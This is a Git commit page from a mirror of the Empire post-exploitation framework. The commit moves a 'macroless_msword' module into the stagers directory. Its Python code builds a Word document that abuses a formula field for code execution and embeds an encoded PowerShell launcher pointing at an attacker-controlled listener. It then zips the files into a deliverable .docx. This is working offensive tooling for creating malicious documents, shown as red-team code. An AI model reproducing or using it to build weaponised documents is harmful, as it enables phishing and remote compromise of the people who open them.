infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

moved the macroless word code exec from 'exploits' to 'stagers' per Xorrior

websockets-multiuser
root 2017-10-20 10:03:02 -04:00
parent 04e522700f
commit 51e98068bd
1 changed files with 66 additions and 85 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
lib/modules/python/exploit/fileformat/macroless_msword.py → lib/stagers/windows/macroless_msword.py
View File

@ -2,7 +2,7 @@
from lib.common import helpers
import os
class Module:
class Stager:
def __init__(self, mainMenu, params=[]):
@ -14,18 +14,6 @@ class Module:
'Description': ('Creates a macroless document utilizing a formula field for code execution'),
'Background' : False,
'OutputExtension' : "",
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'python',
'MinLanguageVersion' : '2.7',
'Comments': ["Hard work by Etienne Stalmas and Saif El-Sherei"]
}
@ -33,12 +21,6 @@ class Module:
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use for the payload.',
'Required' : True,
@ -90,7 +72,7 @@ class Module:
ps1 = self.options['OutputPs1']['Value']
if not self.mainMenu.listeners.is_listener_valid(listener):
print helpers.color("[!] Invalide listener: " + listener)
print helpers.color("[!] Invalid listener: " + listener)
return ""
else:
launcher = self.mainMenu.stagers.generate_launcher(listener, language='powershell', encode=True)
@ -117,6 +99,7 @@ class Module:
docProps_app = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>2</TotalTime><Pages>1</Pages><Words>12</Words><Characters>70</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>81</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>"""
f = open(outdir + "docProps/app.xml", 'w')
f.write(docProps_app)
@ -128,6 +111,7 @@ class Module:
word_rels = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>"""
f = open(outdir + "word/_rels/document.xml.rels", 'w')
f.write(word_rels)
@ -181,10 +165,7 @@ class Module:
craft_ps(output_path, launcher, ps1)
craft_exploit(output_path, host, ps1)
# very hacky
os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx))
print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path))
# very hacky to avoid 'no script returned' message
return "import sys"
return os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx))